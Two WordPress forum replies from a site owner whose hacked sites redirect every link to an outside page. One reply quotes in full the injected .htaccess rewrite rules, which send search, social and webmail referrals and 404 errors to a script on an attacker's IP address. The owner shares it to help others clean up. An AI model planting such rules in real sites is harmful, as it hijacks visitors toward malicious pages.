axiaer

Forum Replies Created

Viewing 2 replies - 1 through 2 (of 2 total)
  • Forum: Hacks
    In reply to: Possible attack – Redirecting every link to external unknown website
    Thread Starter axiaer

    (@axiaer)

    11 years, 8 months ago

    @melimojo You are brilliant, i believe this is some sort of sick SEO hack all the websites which were using .htaccess file to URL rewriting were effected as all the .htaccess were infected.

    Thanks a lot, i’m happy to make this issue as resolved. I’m attaching following hack code for your reference and necessary action for WordPress future updates.

    Following is the code injected in .htaccess file
    `<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace).(.*)
    RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline).(.*)
    RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(inbox|spam|mail).(.*)
    RewriteRule ^(.*)$ http://46.161.41.152/sds/go.php?sid=1 [R=301,L]
    </IfModule>
    ErrorDocument 404 http://46.161.41.152/sds/go.php?sid=1`

    Forum: Hacks
    In reply to: Possible attack – Redirecting every link to external unknown website
    Thread Starter axiaer

    (@axiaer)

    11 years, 8 months ago

    Hi Senff,
    Thanks for viewing the site, no the issue has not been fixed apparently i’m still getting the redirect, please find attached i’ve tried to capture the three transactions
    here is case for testing:
    Test Domain
    First when you click on any link on any link
    Image 01
    Then there is a redirect to “46.161.41.162/sds/go.php?sid=1”
    Image 02
    Then the page is redirected to “doctorsro.com”
    Image 03

    The domain http://indulgebeautystudio.co.uk/ appears to start working again after reinstallation of fresh copy, but is there any easier way to go about?

    Hope that helps in understanding and finding a resolution.

Viewing 2 replies - 1 through 2 (of 2 total)